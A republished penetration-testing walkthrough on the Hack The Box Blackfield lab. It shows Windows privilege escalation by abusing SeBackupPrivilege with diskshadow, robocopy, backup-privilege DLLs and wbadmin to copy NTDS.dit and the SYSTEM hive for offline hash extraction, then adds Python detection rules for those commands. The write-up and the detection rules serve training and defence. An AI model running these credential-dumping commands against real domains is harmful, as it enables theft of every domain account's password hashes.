Elevating Privileges with SeBackupPrivilege on Windows
2023-12-8 02:42:3 Author: infosecwriteups.com

WINDOWS PRIVILEGE ESCALATION

Nairuz Abulhul

InfoSec Write-ups


Once we gain initial access to a system during an internal penetration testing assessment, the next step is to escalate privileges in order to run necessary tools and explore the network effectively. In a Windows environment, one of the common ways to do this is by exploiting a user’s privileges.

Abusing the SeBackupPrivilege is one such way. A user with this privilege can create a full backup of the entire system, including sensitive files such as the Security Account Manager (SAM) database and the Active Directory database, NTDS.dit (NT Directory Services Directory Information Tree).

Then, with that full backup, we can extract the hashes from these files to crack them offline or perform a Pass-the-Hash (PTH) attack to elevate the shell we obtained.

In this article, we will discuss how to create system backups using different techniques by utilizing SeBackupPrivilege. We will also look into extracting hashes from these backups to use them for local escalation. We will use Hack The Box’s Blackfield machine to demonstrate the steps.

The Blackfield machine is part of the Active Directory track, which offers a good opportunity to gain hands-on experience with various AD attacks and prepare for the Pro Lab — OffShore.

After gaining access to the machine as the svc_backup user, we examine the user’s permissions by running the whoami /all command. We notice that the user is a member of the Backup Operators group, which has the SeBackupPrivilege and SeRestorePrivilege enabled as part of its privileges.

Figure 01 — shows the svc_backup user’s privileges.

Since we are a member of the Backup Operators group, we are authorized to create system backups. We will use this to our advantage by creating a backup that includes the NTDS.dit file, from which we can extract the hashes for later use to escalate our privileges.

We will cover three (3) different techniques to achieve that:

Method 1: Diskshadow & Robocopy

The first method involves running the Windows built-in utilities Diskshadow and Robocopy. Diskshadow creates shadow copies (point-in-time snapshots) of a volume that is currently in use, while Robocopy copies files and directories from one location to another.

We cannot copy these system files directly with regular copy commands because they are locked while the operating system is running and has them open.

To create the live copy, we run the script below, which performs a full backup of the C: drive and exposes it as a network drive with the drive letter E:.

Here is the full script and the breakdown of the commands below:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

The script starts with enabling the verbose mode to provide more details on the output. Then, it sets the location of the metadata file.

The meta.cab file is created when we create the shadow copy of the drive. It stores information about our shadow copy, such as the creation date and time, the volume’s name, and the copy’s size.

set verbose on

set metadata C:\Windows\Temp\meta.cab

Next, we set the contexts of the backup to client-accessible and persistent, so that the shadow copy remains accessible to us after the script finishes and survives a reboot of the machine.

set context clientaccessible

set context persistent

Then, the begin backup command initiates the backup operation, and add volume includes the C: drive and assigns it an alias, here cdrive, for later reference. Any alias name will do.

begin backup

add volume C: alias cdrive

Finally, the create command creates the actual shadow copy, expose mounts the copy of the C: drive as a network drive with the letter E:, and the end backup command finalizes the operation.

create

expose %cdrive% E:

end backup

After putting the script together, we pass it to the Diskshadow utility, which creates the shadow copy: a snapshot of the drive taken while the files are still in use.

diskshadow /s back_script.txt

Figure 02 — shows running the diskshadow utility.

When the process is complete, switch to the E: drive and use Robocopy to copy the NTDS.dit file to the Temp directory created on the C: drive.

cd E:

robocopy /b E:\Windows\ntds . ntds.dit

Figure 03 — shows the content of the E: drive (Shadow Copy).
Figure 04 — shows copying the ntds.dit file from the E: to the C:\Temp directory.

Next, we save the SYSTEM registry hive with the reg save command; it contains the key material needed to decrypt the hashes stored in the NTDS file.

reg save hklm\system c:\temp\system.bak
Figure 05 — shows copying the system hive file to the Temp directory.

Then, we download the files locally to our machine to extract the hashes. I used the download command in the Evil-Winrm shell.

download ntds.dit
download system

Method 2: Diskshadow & Dynamic Link Libraries (DLLs)

The second method uses Diskshadow to create a shadow copy and Dynamic Link Libraries (DLLs) to copy the system files as an alternative to Robocopy.

We can use the compiled DLLs from the Giuliano108 repo or compile them locally with Visual Studio. The repo contains two (2) DLLs: SeBackupPrivilegeCmdLets.dll validates that SeBackupPrivilege is enabled, and SeBackupPrivilegeUtils.dll performs the file copy.

Create the Shadow copy with Diskshadow, as shown in method 1; then, upload the DLLs to the target machine and import them.

Import-Module .\SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll

Figure 06 — shows importing the modules.

Then, we use the Copy-FileSeBackupPrivilege function from SeBackupPrivilegeUtils.dll to copy the NTDS.dit file, and save the SYSTEM hive for the hash extraction later.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

reg save hklm\system c:\temp\system

Figure 07 — shows the Copy-FileSeBackupPrivilege function copying the ntds.dit file.
Figure 08 — shows a copy of the System Hive file.

Method 3: Wbadmin Utility

The Wbadmin utility is used to create and restore backups in a Windows environment. To create a backup, use the following command:

wbadmin start backup -quiet -backuptarget:\\dc01\c$\temp -include:c:\windows\ntds
  • wbadmin: Invokes the tool.
  • start backup: Initiates a backup operation.
  • -quiet: Suppresses prompts or messages during the backup process.
  • -backuptarget: Specifies the backup target location (\\dc01\c$\temp).
  • -include: Specifies the path we want to back up (c:\windows\ntds).
Figure 09 — shows the wbadmin utility creating a backup copy of the NTDS.dit.

After running the tool, we verify the backup using the get versions command. As seen below, the backup was created in the temp directory \\dc01\C$\temp.

wbadmin get versions
Figure 10 — shows the list of backups using the get versions command.

To restore the backup we created, we run the command below:

wbadmin start recovery -quiet -version:07/26/2021-03:16 -itemtype:file -item:c:\windows\ntds\ntds.dit -recoverytarget:c:\temp -notrestoreacl
  • -version: Specifies the backup version from which to recover the file.
  • -itemtype:file: Specifies that the item to be recovered is a file.
  • -item: Specifies the exact location of the NTDS file to be recovered (c:\windows\ntds\ntds.dit).
  • -recoverytarget: Specifies the location where the recovered file should be placed (c:\temp).
  • -notrestoreacl: Instructs the recovery process not to restore the ACLs (Access Control Lists) of the recovered file. This means the recovered file will inherit the ACLs of the target location (c:\temp).
Figure 11 — shows the successful restoring of the backup file.

After that, we save the SYSTEM hive for hash extraction later.

reg save hklm\system c:\temp\system
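All three methods leave the same footprint on the host: a shadow copy or backup is created, the NTDS database is read out of it, and the SYSTEM hive is exported. The following Python is an added example, not part of the original article, that applies that logic to constructed process-creation records (the user and cmdline field names, the svc_wb and helpdesk accounts, and the sample command lines are assumptions modelled on the commands above) and flags any account that did both the NTDS read and the hive export.

```python
import re
from collections import defaultdict

# Each rule carries a tag and a regex run over the lowercased command line.
# Tags: "shadow" = shadow copy created, "ntds" = AD database read from a
# shadow copy or backup, "hive" = SYSTEM hive exported (needed to decrypt it).
RULES = {
    "diskshadow_script": ("shadow", re.compile(r"\bdiskshadow(\.exe)?\s+/s\s+\S+")),
    "ntds_copy":         ("ntds",   re.compile(r"\b(robocopy|copy-filesebackupprivilege)\b.*\\windows\\ntds\b")),
    "wbadmin_ntds":      ("ntds",   re.compile(r"\bwbadmin(\.exe)?\s+start\s+(backup|recovery)\b.*\\ntds\b")),
    "system_hive_save":  ("hive",   re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b")),
}

# Constructed sample events shaped like process-creation logs (Sysmon ID 1 /
# Security 4688); field names and the last two accounts are assumptions.
EVENTS = [
    {"user": r"BLACKFIELD\svc_backup", "cmdline": "diskshadow /s back_script.txt"},
    {"user": r"BLACKFIELD\svc_backup", "cmdline": r"robocopy /b E:\Windows\ntds . ntds.dit"},
    {"user": r"BLACKFIELD\svc_backup", "cmdline": r"reg save hklm\system c:\temp\system.bak"},
    # NTDS backed up via wbadmin but no hive export: lower confidence
    {"user": r"BLACKFIELD\svc_wb", "cmdline": r"wbadmin start backup -quiet -backuptarget:\\dc01\c$\temp -include:c:\windows\ntds"},
    # Ordinary administration that must not fire
    {"user": r"BLACKFIELD\helpdesk", "cmdline": r"robocopy /b C:\Users\Public D:\Archive"},
    {"user": r"BLACKFIELD\helpdesk", "cmdline": r"reg query hklm\system\currentcontrolset"},
]


def match_rules(cmdline):
    """Return the names of every rule that fires on one command line."""
    low = cmdline.lower()
    return [name for name, (_tag, rx) in RULES.items() if rx.search(low)]


def tags_per_user(events):
    """Collect the set of rule tags each account has triggered."""
    seen = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["cmdline"]):
            seen[ev["user"]].add(RULES[name][0])
    return dict(seen)


def high_confidence(events):
    """Accounts that both read NTDS.dit and exported the SYSTEM hive: with
    those two files the domain hashes can be recovered offline."""
    return {u for u, t in tags_per_user(events).items() if {"ntds", "hive"} <= t}


if __name__ == "__main__":
    for user, tags in tags_per_user(EVENTS).items():
        print(f"{user}: {sorted(tags)}")
    print("high confidence:", high_confidence(EVENTS))
```

Pairing the command-line rules with a check on Backup Operators membership (the whoami /all output shown earlier) separates routine backup jobs from an account that is assembling the two files it needs for offline hash extraction.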

Article source: https://infosecwriteups.com/elevating-privileges-with-sebackupprivilege-on-windows-107bd34befa2?source=rss----7b722bfd1b8d---4